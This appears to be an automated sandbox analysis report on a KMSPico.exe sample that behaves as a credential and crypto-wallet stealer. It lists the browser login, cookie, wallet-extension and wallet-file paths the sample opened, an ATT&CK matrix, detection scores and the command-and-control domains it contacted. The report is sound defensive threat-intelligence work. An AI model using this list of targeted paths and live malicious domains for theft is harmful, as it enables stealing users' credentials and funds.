            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
            Source: Yara matchFile source: 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (one tactic per column; a number in parentheses is the count of matched signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (11) | OS Credential Dumping (1) | Security Software Discovery (121) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Virtualization/Sandbox Evasion (11) | Remote Desktop Protocol | Data from Local System (31) | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (113) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (1) | NTDS | File and Directory Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (22) | LSA Secrets | System Information Discovery (12) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1400640; Sample: KMSPico.exe; Start date: 29/02/2024; Architecture: WINDOWS; Score: 100)
- Contacted domains: technologyenterdo.shop, problemregardybuiwo.fun
- Top-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 7 other signatures
- Process KMSPico.exe started; connects to technologyenterdo.shop (104.21.80.118, port 443, local ports 49704 and 49705; CLOUDFLARENETUS, United States)
- Process signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Query firmware table information (likely to detect VMs); 4 other signatures
- KMSPico.exe started WerFault.exe

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
KMSPico.exe | 37% | ReversingLabs | Win32.Trojan.CrypterX
KMSPico.exe | 46% | Virustotal |
KMSPico.exe | 100% | Avira | HEUR/AGEN.1352498
KMSPico.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
technologyenterdo.shop | 16% | Virustotal |
problemregardybuiwo.fun | 18% | Virustotal |
Source | Detection | Scanner | Label
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://technologyenterdo.shop/& | 0% | Avira URL Cloud | safe
technologyenterdo.shop | 0% | Avira URL Cloud | safe
https://technologyenterdo.shop/apie | 0% | Avira URL Cloud | safe
problemregardybuiwo.fun | 18% | Virustotal |
https://technologyenterdo.shop/apie | 0% | Virustotal |
pooreveningfuseor.pw | 0% | Avira URL Cloud | safe
problemregardybuiwo.fun | 100% | Avira URL Cloud | malware
pooreveningfuseor.pw | 14% | Virustotal |
associationokeo.shop | 100% | Avira URL Cloud | malware
https://technologyenterdo.shop/1 | 0% | Avira URL Cloud | safe
turkeyunlikelyofw.shop | 100% | Avira URL Cloud | malware
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
technologyenterdo.shop | 16% | Virustotal |
detectordiscusser.shop | 0% | Avira URL Cloud | safe
turkeyunlikelyofw.shop | 20% | Virustotal |
https://technologyenterdo.shop/J | 0% | Avira URL Cloud | safe
associationokeo.shop | 20% | Virustotal |
https://technologyenterdo.shop/apis | 0% | Avira URL Cloud | safe
https://technologyenterdo.shop/y | 0% | Avira URL Cloud | safe
https://technologyenterdo.shop/api | 100% | Avira URL Cloud | malware
https://technologyenterdo.shop/ | 0% | Avira URL Cloud | safe
detectordiscusser.shop | 19% | Virustotal |
https://technologyenterdo.shop/ | 15% | Virustotal |
https://technologyenterdo.shop/? | 0% | Avira URL Cloud | safe
https://technologyenterdo.shop/y | 15% | Virustotal |
https://technologyenterdo.shop/apik4 | 0% | Avira URL Cloud | safe
https://technologyenterdo.shop/api | 19% | Virustotal |
https://technologyenterdo.shop/apis | 14% | Virustotal |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
technologyenterdo.shop | 104.21.80.118 | true | true | | unknown
problemregardybuiwo.fun | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
problemregardybuiwo.fun | true | 18% Virustotal; Avira URL Cloud: malware | unknown
technologyenterdo.shop | true | 16% Virustotal; Avira URL Cloud: safe | unknown
pooreveningfuseor.pw | true | 14% Virustotal; Avira URL Cloud: safe | unknown
associationokeo.shop | true | 20% Virustotal; Avira URL Cloud: malware | unknown
turkeyunlikelyofw.shop | true | 20% Virustotal; Avira URL Cloud: malware | unknown
detectordiscusser.shop | true | 19% Virustotal; Avira URL Cloud: safe | unknown
https://technologyenterdo.shop/api | true | 19% Virustotal; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://technologyenterdo.shop/apie | KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
